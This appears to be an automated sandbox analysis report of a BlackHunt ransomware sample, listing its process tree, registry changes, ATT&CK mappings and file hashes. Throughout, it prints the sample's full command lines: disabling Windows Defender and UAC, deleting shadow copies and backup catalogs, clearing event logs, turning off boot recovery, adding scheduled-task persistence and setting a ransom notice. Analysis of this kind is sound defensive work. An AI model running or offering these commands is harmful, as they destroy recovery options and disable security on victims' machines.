2552d38dc482c03071eb1f15b2e9253ec9f312e713a4bf41912dfee4ed38740c.exe 238 PID 4212 wrote to memory of 4352 4212 2552d38dc482c03071eb1f15b2e9253ec9f312e713a4bf41912dfee4ed38740c.exe 238 PID 1400 wrote to memory of 4804 1400 cmd.exe 140 PID 1400 wrote to memory of 4804 1400 cmd.exe 140 PID 4212 wrote to memory of 220 4212 2552d38dc482c03071eb1f15b2e9253ec9f312e713a4bf41912dfee4ed38740c.exe 62 PID 4212 wrote to memory of 220 4212 2552d38dc482c03071eb1f15b2e9253ec9f312e713a4bf41912dfee4ed38740c.exe 62 PID 2368 wrote to memory of 532 2368 cmd.exe 272 PID 2368 wrote to memory of 532 2368 cmd.exe 272 PID 4212 wrote to memory of 388 4212 2552d38dc482c03071eb1f15b2e9253ec9f312e713a4bf41912dfee4ed38740c.exe 67 PID 4212 wrote to memory of 388 4212 2552d38dc482c03071eb1f15b2e9253ec9f312e713a4bf41912dfee4ed38740c.exe 67 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System 2552d38dc482c03071eb1f15b2e9253ec9f312e713a4bf41912dfee4ed38740c.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 2552d38dc482c03071eb1f15b2e9253ec9f312e713a4bf41912dfee4ed38740c.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" 2552d38dc482c03071eb1f15b2e9253ec9f312e713a4bf41912dfee4ed38740c.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\2552d38dc482c03071eb1f15b2e9253ec9f312e713a4bf41912dfee4ed38740c.exe"C:\Users\Admin\AppData\Local\Temp\2552d38dc482c03071eb1f15b2e9253ec9f312e713a4bf41912dfee4ed38740c.exe"1⤵
- UAC bypass
- Checks computer location settings
- Checks whether UAC is enabled
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:4212 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵PID:3468
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:1756 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵PID:2980
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f4⤵PID:7816
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2512 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f3⤵
- Adds Run key to start application
PID:1484
-
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:2196
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵PID:4928
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f3⤵PID:4284
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:220
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:2888
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:5040
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f3⤵PID:2288
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:388
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f3⤵PID:2312
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵
- Suspicious use of WriteProcessMemory
PID:3468 -
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:8700
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f3⤵
- Modifies registry class
PID:4396
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:2840
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:9420
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:3368
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:4388
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:2308
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:2196
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:1664
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:4552
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:3308
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:376
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\2552d38dc482c03071eb1f15b2e9253ec9f312e713a4bf41912dfee4ed38740c.exe" /F2⤵PID:4920
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵
- Modifies registry class
PID:2980
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:4448
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:2756
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:3076
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:1908
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:4644
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:412
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:4352
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:2836
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:5048
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:1760
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵PID:2896
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵PID:2892
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵PID:4196
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:2368
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵PID:3572
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:1400
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵
- Suspicious use of WriteProcessMemory
PID:3192
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:1776
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:4368
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:4932
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2644
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\2⤵PID:12236
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D C:\3⤵PID:884
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\2⤵PID:13068
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D F:\3⤵PID:12540
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\2⤵PID:6840
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D M:\3⤵PID:12960
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup2⤵PID:12664
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Setup3⤵
- Clears Windows event logs
PID:13256
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application2⤵PID:12768
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Application3⤵
- Clears Windows event logs
PID:9160
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security2⤵PID:4352
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security3⤵
- Clears Windows event logs
PID:11696
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false2⤵PID:7360
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security /e:false3⤵
- Clears Windows event logs
PID:12856
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System2⤵PID:13136
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl System3⤵
- Clears Windows event logs
PID:5656
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:12876
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:12912
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:12488
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:14540
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:11836
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:15032
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f2⤵PID:11572
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f3⤵PID:2888
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f2⤵PID:5128
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f3⤵PID:7812
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt2⤵PID:5896
-
C:\Windows\system32\notepad.exenotepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt3⤵PID:8100
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f2⤵PID:7820
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:532
-
-
C:\Windows\system32\taskkill.exetaskkill /IM mshta.exe /f3⤵
- Kills process with taskkill
PID:6024
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\2552d38dc482c03071eb1f15b2e9253ec9f312e713a4bf41912dfee4ed38740c.exe"2⤵PID:772
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
PID:4820
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta2⤵PID:12300
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\#BlackHunt_ReadMe.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵PID:12712
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 12712 -s 14444⤵
- Program crash
PID:13020
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f2⤵PID:12096
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f3⤵PID:13132
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "Windows Critical Update" /F2⤵PID:6240
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Delete /TN "Windows Critical Update" /F3⤵PID:8720
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f2⤵PID:11116
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f3⤵PID:11024
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:11464
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:2400
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:12572
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f1⤵PID:3568
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f1⤵PID:532
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f1⤵PID:4488
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f1⤵PID:1912
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f1⤵PID:6052
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f1⤵PID:6404
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f1⤵PID:7132
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f1⤵PID:7540
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Interacts with shadow copies
PID:12028
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No1⤵
- Modifies boot configuration data using bcdedit
PID:11008
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB1⤵
- Interacts with shadow copies
PID:8068
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:1⤵
- Deletes NTFS Change Journal
PID:11332
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet1⤵
- Deletes backup catalog
PID:5344
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:12476
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable1⤵PID:5440
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures1⤵
- Modifies boot configuration data using bcdedit
PID:5240
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:5796
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB1⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:7928
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:9720
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\2552d38dc482c03071eb1f15b2e9253ec9f312e713a4bf41912dfee4ed38740c.exe" /F1⤵
- Creates scheduled task(s)
PID:7720
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f1⤵PID:7360
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f1⤵PID:6740
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵PID:3568
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵PID:6996
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f1⤵PID:3656
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f1⤵PID:4468
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f1⤵PID:3776
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f1⤵PID:992
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f1⤵PID:4804
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f1⤵
- Modifies Windows Defender Real-time Protection settings
PID:4936
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f1⤵PID:4332
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f1⤵PID:1548
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f1⤵PID:4460
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f1⤵
- Modifies registry class
PID:4384
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f1⤵
- Modifies registry class
PID:3276
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures1⤵
- Modifies boot configuration data using bcdedit
PID:5380
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No1⤵
- Modifies boot configuration data using bcdedit
PID:3876
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵PID:376
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:1⤵
- Deletes NTFS Change Journal
PID:12348
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 12712 -ip 127121⤵PID:13064
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
4File Deletion
3Modify Registry
4Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
12KB
MD521cb361c9789d1f35eac14dfa4ae7e20
SHA1d6d91bcf394c0ea0157149ad925f0600a9c5cd6e
SHA2565908c30b1c218cd460199dae7e678c13cab2a1c968b2b21f363a16ae147e4763
SHA512babd7e045d0027c07c680d19b14a59d1eee86ee70e14ef7ff4fe2f3cb4195ae351a54b7abf95fd503923a0de793646a9fda9b4c32c2716f6204cdddab7a598d9
-
Filesize
684B
MD569c64d57304e11e23bc83de0e498ee01
SHA13399bdf86c7ffe6897cabdfd407378fda01af5fe
SHA256ff3296833cad366d61d97ddc095061b6e2c90f91fa6d8896bd747883867ff3e5
